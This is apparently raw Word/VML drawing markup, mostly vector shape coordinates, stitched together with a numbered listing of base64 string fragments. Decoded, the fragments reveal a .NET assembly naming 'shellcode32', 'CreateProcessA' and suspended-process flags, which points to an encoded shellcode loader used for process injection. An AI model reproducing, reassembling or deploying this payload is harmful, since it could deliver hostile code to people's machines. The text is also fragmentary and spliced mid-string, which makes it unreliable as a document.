701,2488,14701,2486,14701,2485,14701,2484,14701,2483,14701,2481,14701,2480,14701,2479,14701,2477,14701,2476,14701,2475,14701,2473,14701,2472,14701,2470,14701,2468,14701,2467,14701,2465,14701,2463,14701,2462,14701,2460,14701,2458,14701,2456,14701,2454,14701,2452,14701,2450,14701,2448,14701,2446,14701,2444,14701,2442,14701,2440,14701,2437,14701,2435,14701,2433,14701,2430,14701,2428,14701,2426,14701,2423,14701,2420,14701,2418,14701,2415,14701,2412,14701,2410,14701,2407,14701,2404,14701,2401,14701,2398,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14701,2395,14700,2395,14700,2395,14700,2395,14700,2395,14700,2395,14699,2395,14699,2395,14699,2395,14698,2395,14698,2395,14698,2395,14697,2395,14697,2395,14696,2395,14696,2395,14695,2395,14695,2395,14694,2395,14694,2395,14693,2395,14692,2395,14692,2395,14691,2395,14690,2395,14689,2395,14689,2395,14688,2395,14687,2395,14686,2395,14685,2395,14684,2395,14682,2395,14681,2395,14680,2395,14679,2395,14678,2395,14676,2395,14675,2395,14673,2395,14672,2395,14670,2395,14669,2395,14667,2395,14665,2395,14664,2395,14662,2395,14660,2395,14658,2395,14656,2395,14654,2395,14652,2395,14649,2395,14647,2395,14645,2395,14643,2395,14640,2395,14638,2395,14635,2395,14632,2395,14630,2395,14627,2395,14624,2395,14621,2395,14618,2395,14615,2395,14612,2395,14608,2395,14605,2395,14602,2395,14598,2395,14595,2395,14591,2395,14587,2395,14584,2395,14580,2395,14576,2395,14572,2395,14567,2395,14563,2395,14559,2395,14555,2395,14550,2395,14545,2395,14541,2395,14536,2395,14531,2395,14526,2395,14521,2395,14516,2395,14511,2395,14505,2395,14500,2395,14494,2395,14489,2395,14483,2395,14477,2395,14471,2395,14465,2395,14459,2395,14453,2395,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:721.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,14430" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:14430;width:130;height:270" coordorigin="2850,14430" coordsize="130,270" path="m2875,14446l2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2875,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2876,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2877,14446,2878,14446,2878,14446,2878,14446,2878,14446,2879,14446,2879,14446,2879,14446,2879,14446,2880,14446,2880,14446,2880,14446,2881,14446,2881,14446,2882,14446,2882,14446,2882,14446,2883,14446,2883,14446,2884,14446,2884,14446,2885,14446,2885,14446,2886,14446,2887,14446,2887,14446,2888,14446,2889,14446,2889,14446,2890,14446,2891,14446,2892,14446,2892,14446,2893,14446,2894,14446,2895,14446,2896,14446,2897,14446,2898,14446,2899,14446,2900,14446,2901,14446,2902,14446,2903,14446,2904,14446,2906,14446,2907,14446,2908,14446,2909,14446,2911,14446,2912,14446,2913,14446,2915,14446,2916,14446,2918,14446,2919,14446,2921,14446,2922,14446,2924,14446,2926,14446,2927,14446,2929,14446,2931,14446,2933,14446,2935,14446,2937,14446,2938,14446,2940,14446,2943,14446,2945,14446,2947,14446,2949,14446,2951,14446,2953,14446,2956,14446,2958,14446,2960,14446,2963,14446,2965,14446,2968,14446,2970,14446,2973,14446,2976,14446,2978,14446,2981,14446,2984,14446,2987,14446,2990,14446,2993,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14446,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14447,2996,14448,2996,14448,2996,14448,2996,14448,2996,14449,2996,14449,2996,14449,2996,14450,2996,14450,2996,14450,2996,14451,2996,14451,2996,14452,2996,14452,2996,14453,2996,14453,2996,14454,2996,14455,2996,14455,2996,14456,2996,14457,2996,14457,2996,14458,2996,14459,2996,14460,2996,14461,2996,14462,2996,14463,2996,14464,2996,14465,2996,14466,2996,14468,2996,14469,2996,14470,2996,14471,2996,14473,2996,14474,2996,14476,2996,14477,2996,14479,2996,14481,2996,14482,2996,14484,2996,14486,2996,14488,2996,14490,2996,14492,2996,14494,2996,14496,2996,14498,2996,14500,2996,14503,2996,14505,2996,14508,2996,14510,2996,14513,2996,14515,2996,14518,2996,14521,2996,14524,2996,14527,2996,14530,2996,14533,2996,14536,2996,14539,2996,14543,2996,14546,2996,14549,2996,14553,2996,14557,2996,14560,2996,14564,2996,14568,2996,14572,2996,14576,2996,14580,2996,14584,2996,14589,2996,14593,2996,14598,2996,14602,2996,14607,2996,14612,2996,14617,2996,14622,2996,14627,2996,14632,2996,14637,2996,14642,2996,14648,2996,14653,2996,14659,2996,14665,2996,14671,2996,14677,2996,14683,2996,14689,2996,14695,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2996,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2995,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2994,14701,2993,14701,2993,14701,2993,14701,2993,14701,2992,14701,2992,14701,2992,14701,2992,14701,2991,14701,2991,14701,2991,14701,2990,14701,2990,14701,2989,14701,2989,14701,2989,14701,2988,14701,2988,14701,2987,14701,2987,14701,2986,14701,2985,14701,2985,14701,2984,14701,2984,14701,2983,14701,2982,14701,2982,14701,2981,14701,2980,14701,2979,14701,2979,14701,2978,14701,2977,14701,2976,14701,2975,14701,2974,14701,2973,14701,2972,14701,2971,14701,2970,14701,2969,14701,2968,14701,2967,14701,2965,14701,2964,14701,2963,14701,2962,14701,2960,14701,2959,14701,2958,14701,2956,14701,2955,14701,2953,14701,2952,14701,2950,14701,2949,14701,2947,14701,2945,14701,2944,14701,2942,14701,2940,14701,2938,14701,2936,14701,2934,14701,2932,14701,2930,14701,2928,14701,2926,14701,2924,14701,2922,14701,2920,14701,2918,14701,2915,14701,2913,14701,2911,14701,2908,14701,2906,14701,2903,14701,2901,14701,2898,14701,2895,14701,2893,14701,2890,14701,2887,14701,2884,14701,2881,14701,2878,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14701,2875,14700,2875,14700,2875,14700,2875,14700,2875,14700,2875,14699,2875,14699,2875,14699,2875,14698,2875,14698,2875,14698,2875,14697,2875,14697,2875,14696,2875,14696,2875,14695,2875,14695,2875,14694,2875,14694,2875,14693,2875,14692,2875,14692,2875,14691,2875,14690,2875,14689,2875,14689,2875,14688,2875,14687,2875,14686,2875,14685,2875,14684,2875,14682,2875,14681,2875,14680,2875,14679,2875,14678,2875,14676,2875,14675,2875,14673,2875,14672,2875,14670,2875,14669,2875,14667,2875,14665,2875,14664,2875,14662,2875,14660,2875,14658,2875,14656,2875,14654,2875,14652,2875,14649,2875,14647,2875,14645,2875,14643,2875,14640,2875,14638,2875,14635,2875,14632,2875,14630,2875,14627,2875,14624,2875,14621,2875,14618,2875,14615,2875,14612,2875,14608,2875,14605,2875,14602,2875,14598,2875,14595,2875,14591,2875,14587,2875,14584,2875,14580,2875,14576,2875,14572,2875,14567,2875,14563,2875,14559,2875,14555,2875,14550,2875,14545,2875,14541,2875,14536,2875,14531,2875,14526,2875,14521,2875,14516,2875,14511,2875,14505,2875,14500,2875,14494,2875,14489,2875,14483,2875,14477,2875,14471,2875,14465,2875,14459,2875,14453,2875,14446e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2370;top:15050;width:130;height:270" coordorigin="2370,15050" coordsize="130,270" path="m2395,15077l2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2395,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2396,15077,2397,15077,2397,15077,2397,15077,2397,15077,2397,15077,2398,15077,2398,15077,2398,15077,2398,15077,2399,15077,2399,15077,2399,15077,2399,15077,2400,15077,2400,15077,2400,15077,2401,15077,2401,15077,2402,15077,2402,15077,2403,15077,2403,15077,2404,15077,2404,15077,2405,15077,2405,15077,2406,15077,2406,15077,2407,15077,2408,15077,2408,15077,2409,15077,2410,15077,2411,15077,2411,15077,2412,15077,2413,15077,2414,15077,2415,15077,2416,15077,2417,15077,2418,15077,2419,15077,2420,15077,2421,15077,2422,15077,2423,15077,2424,15077,2425,15077,2426,15077,2428,15077,2429,15077,2430,15077,2432,15077,2433,15077,2434,15077,2436,15077,2437,15077,2439,15077,2441,15077,2442,15077,2444,15077,2445,15077,2447,15077,2449,15077,2451,15077,2453,15077,2454,15077,2456,15077,2458,15077,2460,15077,2462,15077,2464,15077,2466,15077,2469,15077,2471,15077,2473,15077,2475,15077,2478,15077,2480,15077,2482,15077,2485,15077,2487,15077,2490,15077,2493,15077,2495,15077,2498,15077,2501,15077,2504,15077,2506,15077,2509,15077,2512,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15077,2515,15078,2515,15078,2515,15078,2515,15078,2515,15078,2515,15079,2515,15079,2515,15079,2515,15080,2515,15080,2515,15080,2515,15081,2515,15081,2515,15082,2515,15082,2515,15083,2515,15083,2515,15084,2515,15084,2515,15085,2515,15086,2515,15086,2515,15087,2515,15088,2515,15089,2515,15089,2515,15090,2515,15091,2515,15092,2515,15093,2515,15094,2515,15096,2515,15097,2515,15098,2515,15099,2515,15100,2515,15102,2515,15103,2515,15105,2515,15106,2515,15108,2515,15109,2515,15111,2515,15113,2515,15114,2515,15116,2515,15118,2515,15120,2515,15122,2515,15124,2515,15126,2515,15129,2515,15131,2515,15133,2515,15135,2515,15138,2515,15140,2515,15143,2515,15146,2515,15148,2515,15151,2515,15154,2515,15157,2515,15160,2515,15163,2515,15166,2515,15170,2515,15173,2515,15176,2515,15180,2515,15183,2515,15187,2515,15191,2515,15194,2515,15198,2515,15202,2515,15206,2515,15211,2515,15215,2515,15219,2515,15223,2515,15228,2515,15233,2515,15237,2515,15242,2515,15247,2515,15252,2515,15257,2515,15262,2515,15267,2515,15273,2515,15278,2515,15284,2515,15289,2515,15295,2515,15301,2515,15307,2515,15313,2515,15319,2515,15325,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2515,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2514,15332,2513,15332,2513,15332,2513,15332,2513,15332,2512,15332,2512,15332,2512,15332,2512,15332,2511,15332,2511,15332,2511,15332,2510,15332,2510,15332,2510,15332,2509,15332,2509,15332,2508,15332,2508,15332,2507,15332,2507,15332,2506,15332,2506,15332,2505,15332,2505,15332,2504,15332,2503,15332,2503,15332,2502,15332,2501,15332,2501,15332,2500,15332,2499,15332,2498,15332,2497,15332,2497,15332,2496,15332,2495,15332,2494,15332,2493,15332,2492,15332,2491,15332,2490,15332,2489,15332,2488,15332,2486,15332,2485,15332,2484,15332,2483,15332,2481,15332,2480,15332,2479,15332,2477,15332,2476,15332,2475,15332,2473,15332,2472,15332,2470,15332,2468,15332,2467,15332,2465,15332,2463,15332,2462,15332,2460,15332,2458,15332,2456,15332,2454,15332,2452,15332,2450,15332,2448,15332,2446,15332,2444,15332,2442,15332,2440,15332,2437,15332,2435,15332,2433,15332,2430,15332,2428,15332,2426,15332,2423,15332,2420,15332,2418,15332,2415,15332,2412,15332,2410,15332,2407,15332,2404,15332,2401,15332,2398,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15332,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15331,2395,15330,2395,15330,2395,15330,2395,15330,2395,15329,2395,15329,2395,15329,2395,15328,2395,15328,2395,15328,2395,15327,2395,15327,2395,15326,2395,15326,2395,15325,2395,15325,2395,15324,2395,15323,2395,15323,2395,15322,2395,15321,2395,15321,2395,15320,2395,15319,2395,15318,2395,15317,2395,15316,2395,15315,2395,15314,2395,15313,2395,15312,2395,15310,2395,15309,2395,15308,2395,15307,2395,15305,2395,15304,2395,15302,2395,15301,2395,15299,2395,15297,2395,15296,2395,15294,2395,15292,2395,15290,2395,15288,2395,15286,2395,15284,2395,15282,2395,15280,2395,15278,2395,15275,2395,15273,2395,15270,2395,15268,2395,15265,2395,15263,2395,15260,2395,15257,2395,15254,2395,15251,2395,15248,2395,15245,2395,15242,2395,15239,2395,15235,2395,15232,2395,15229,2395,15225,2395,15221,2395,15218,2395,15214,2395,15210,2395,15206,2395,15202,2395,15198,2395,15194,2395,15189,2395,15185,2395,15180,2395,15176,2395,15171,2395,15166,2395,15161,2395,15156,2395,15151,2395,15146,2395,15141,2395,15136,2395,15130,2395,15125,2395,15119,2395,15113,2395,15107,2395,15101,2395,15095,2395,15089,2395,15083,2395,15077e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:142.500pt;margin-top:752.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2850,15050" coordsize="130,270">
        <v:shape style="position:absolute;left:2850;top:15050;width:130;height:270" coordorigin="2850,15050" coordsize="130,270" path="m2875,15077l2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2875,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2876,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2877,15077,2878,15077,2878,15077,2878,15077,2878,15077,2879,15077,2879,15077,2879,15077,2879,15077,2880,15077,2880,15077,2880,15077,2881,15077,2881,15077,2882,15077,2882,15077,2882,15077,2883,15077,2883,15077,2884,15077,2884,15077,2885,15077,2885,15077,2886,15077,2887,15077,2887,15077,2888,15077,2889,15077,2889,15077,2890,15077,2891,15077,2892,15077,2892,15077,2893,15077,2894,15077,2895,15077,2896,15077,2897,15077,2898,15077,2899,15077,2900,15077,2901,15077,2902,15077,2903,15077,2904,15077,2906,15077,2907,15077,2908,15077,2909,15077,2911,15077,2912,15077,2913,15077,2915,15077,2916,15077,2918,15077,2919,15077,2921,15077,2922,15077,2924,15077,2926,15077,2927,15077,2929,15077,2931,15077,2933,15077,2935,15077,2937,15077,2938,15077,2940,15077,2943,15077,2945,15077,2947,15077,2949,15077,2951,15077,2953,15077,2956,15077,2958,15077,2960,15077,2963,15077,2965,15077,2968,15077,2970,15077,2973,15077,2976,15077,2978,15077,2981,15077,2984,15077,2987,15077,2990,15077,2993,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15077,2996,15078,2996,15078,2996,15078,2996,15078,2996,15078,2996,15079,2996,15079,2996,15079,2996,15080,2996,15080,2996,15080,2996,15081,2996,15081,2996,15082,2996,15082,2996,15083,2996,15083,2996,15084,2996,15084,2996,15085,2996,15086,2996,15086,2996,15087,2996,15088,2996,15089,2996,15089,2996,15090,2996,15091,2996,15092,2996,15093,2996,15094,2996,15096,2996,15097,2996,15098,2996,15099,2996,15100,2996,15102,2996,15103,2996,15105,2996,15106,2996,15108,2996,15109,2996,15111,2996,15113,2996,15114,2996,15116,2996,15118,2996,15120,2996,15122,2996,15124,2996,15126,2996,15129,2996,15131,2996,15133,2996,15135,2996,15138,2996,15140,2996,15143,2996,15146,2996,15148,2996,15151,2996,15154,2996,15157,2996,15160,2996,15163,2996,15166,2996,15170,2996,15173,2996,15176,2996,15180,2996,15183,2996,15187,2996,15191,2996,15194,2996,15198,2996,15202,2996,15206,2996,15211,2996,15215,2996,15219,2996,15223,2996,15228,2996,15233,2996,15237,2996,15242,2996,15247,2996,15252,2996,15257,2996,15262,2996,15267,2996,15273,2996,15278,2996,15284,2996,15289,2996,15295,2996,15301,2996,15307,2996,15313,2996,15319,2996,15325,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2996,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2995,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2994,15332,2993,15332,2993,15332,2993,15332,2993,15332,2992,15332,2992,15332,2992,15332,2992,15332,2991,15332,2991,15332,2991,15332,2990,15332,2990,15332,2989,15332,2989,15332,2989,15332,2988,15332,2988,15332,2987,15332,2987,15332,2986,15332,2985,15332,2985,15332,2984,15332,2984,15332,2983,15332,2982,15332,2982,15332,2981,15332,2980,15332,2979,15332,2979,15332,2978,15332,2977,15332,2976,15332,2975,15332,2974,15332,2973,15332,2972,15332,2971,15332,2970,15332,2969,15332,2968,15332,2967,15332,2965,15332,2964,15332,2963,15332,2962,15332,2960,15332,2959,15332,2958,15332,2956,15332,2955,15332,2953,15332,2952,15332,2950,15332,2949,15332,2947,15332,2945,15332,2944,15332,2942,15332,2940,15332,2938,15332,2936,15332,2934,15332,2932,15332,2930,15332,2928,15332,2926,15332,2924,15332,2922,15332,2920,15332,2918,15332,2915,15332,2913,15332,2911,15332,2908,15332,2906,15332,2903,15332,2901,15332,2898,15332,2895,15332,2893,15332,2890,15332,2887,15332,2884,15332,2881,15332,2878,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15332,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15331,2875,15330,2875,15330,2875,15330,2875,15330,2875,15329,2875,15329,2875,15329,2875,15328,2875,15328,2875,15328,2875,15327,2875,15327,2875,15326,2875,15326,2875,15325,2875,15325,2875,15324,2875,15323,2875,15323,2875,15322,2875,15321,2875,15321,2875,15320,2875,15319,2875,15318,2875,15317,2875,15316,2875,15315,2875,15314,2875,15313,2875,15312,2875,15310,2875,15309,2875,15308,2875,15307,2875,15305,2875,15304,2875,15302,2875,15301,2875,15299,2875,15297,2875,15296,2875,15294,2875,15292,2875,15290,2875,15288,2875,15286,2875,15284,2875,15282,2875,15280,2875,15278,2875,15275,2875,15273,2875,15270,2875,15268,2875,15265,2875,15263,2875,15260,2875,15257,2875,15254,2875,15251,2875,15248,2875,15245,2875,15242,2875,15239,2875,15235,2875,15232,2875,15229,2875,15225,2875,15221,2875,15218,2875,15214,2875,15210,2875,15206,2875,15202,2875,15198,2875,15194,2875,15189,2875,15185,2875,15180,2875,15176,2875,15171,2875,15166,2875,15161,2875,15156,2875,15151,2875,15146,2875,15141,2875,15136,2875,15130,2875,15125,2875,15119,2875,15113,2875,15107,2875,15101,2875,15095,2875,15089,2875,15083,2875,15077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86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87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"CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxA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D4HE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AA5AD4HEABB"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88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"AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HB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gB5A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D4HBgCZAFMG"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89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"KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxA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C8JR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gC5AAoGTAAJ"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90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"ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAf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QAJA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EQAggAJAEgA"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91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"hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJA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GgAr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wAJAGwAtAAJ"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92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"AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3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AAJA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JAA4QAJAJQA"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93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"5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJA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AQB4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QAJAAgB9QAJ"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94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"AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBX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wAJA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DABZAAJADQB"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95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"aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuA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CsAh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wEuADMAmAEu"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96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"ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAn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gGjA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HMAWgDDAHMA"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97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"WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJA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GMIA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QAAAQsA1AMB"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98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"AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAA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gAEA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AIABQACAAYA"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99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"AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwU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mVzZ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XJ2ZWQyADxN"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100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"b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9K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T0IA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RVhFQ1VURV9S"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101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"RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRf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RU5E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AERVUExJQ0FU"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102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"RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVB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VEVf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TkVXX0NPTlNP"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103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"TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RP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UkNI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AFdSSVRFX1dB"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104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"VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9D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T0RF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X0FVVEhaX0xF"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105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"VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09X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X1ZE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TQBQUk9DRVNT"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106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"X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVX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X1BS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T0NFU1NfR1JP"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107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"VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENS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RUFU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RV9GT1JDRURP"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108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"UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNT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AEhJ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R0hfUFJJT1JJ"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109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"VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05P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Uk1B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TF9QUklPUklU"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842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:16840" coordorigin="10402,0" coordsize="0,16840" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,2,10402,3,10402,5,10402,7,10402,9,10402,13,10402,17,10402,21,10402,27,10402,33,10402,40,10402,49,10402,58,10402,68,10402,79,10402,92,10402,106,10402,121,10402,138,10402,156,10402,175,10402,196,10402,219,10402,243,10402,269,10402,297,10402,327,10402,359,10402,392,10402,428,10402,466,10402,506,10402,548,10402,592,10402,639,10402,688,10402,740,10402,794,10402,851,10402,910,10402,972,10402,1037,10402,1105,10402,1175,10402,1249,10402,1325,10402,1405,10402,1487,10402,1573,10402,1662,10402,1754,10402,1850,10402,1949,10402,2052,10402,2158,10402,2268,10402,2381,10402,2498,10402,2619,10402,2744,10402,2872,10402,3005,10402,3142,10402,3282,10402,3427,10402,3576,10402,3729,10402,3887,10402,4049,10402,4215,10402,4386,10402,4562,10402,4742,10402,4927,10402,5116,10402,5310,10402,5509,10402,5713,10402,5922,10402,6137,10402,6356,10402,6580,10402,6810,10402,7044,10402,7284,10402,7530,10402,7781,10402,8038,10402,8300,10402,8567,10402,8841,10402,9120,10402,9405,10402,9696,10402,9993,10402,10295,10402,10604,10402,10919,10402,11240,10402,11568,10402,11901,10402,12242,10402,12588,10402,12941,10402,13300,10402,13666,10402,14039,10402,14419,10402,14805,10402,15198,10402,15598,10402,16005,10402,16419,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,670" path="m1510,999l1510,999,1510,999,1510,999,1510,999,1510,999,1510,999,1511,999,1512,999,1512,999,1514,999,1515,999,1517,999,1519,999,1521,999,1524,999,1528,999,1532,999,1536,999,1541,999,1546,999,1552,999,1559,999,1566,999,1575,999,1583,999,1593,999,1603,999,1615,999,1627,999,1640,999,1654,999,1668,999,1684,999,1701,999,1719,999,1738,999,1758,999,1780,999,1802,999,1826,999,1851,999,1877,999,1904,999,1933,999,1963,999,1995,999,2028,999,2063,999,2099,999,2136,999,2175,999,2216,999,2259,999,2303,999,2348,999,2396,999,2445,999,2496,999,2549,999,2604,999,2660,999,2719,999,2779,999,2841,999,2906,999,2972,999,3041,999,3112,999,3184,999,3259,999,3336,999,3416,999,3498,999,3582,999,3668,999,3757,999,3848,999,3941,999,4037,999,4136,999,4236,999,4340,999,4446,999,4555,999,4666,999,4780,999,4897,999,5017,999,5139,999,5264,999,5392,999,5523,999,5657,999,5793,999,5933,999,6076,999,6222,999,6370,999,6522,999,6677,999,6835,999,6997,999,7161,999,7329,999,7500,999,7675,999,7853,999,8034,999,8219,999,8407,999,8598,999,8793,999,8992,999,9194,999,9400,999,9609,999,9823,999,10039,999,10260,999,10484,999,10484,999,10484,999,10484,999,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1000,10484,1001,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645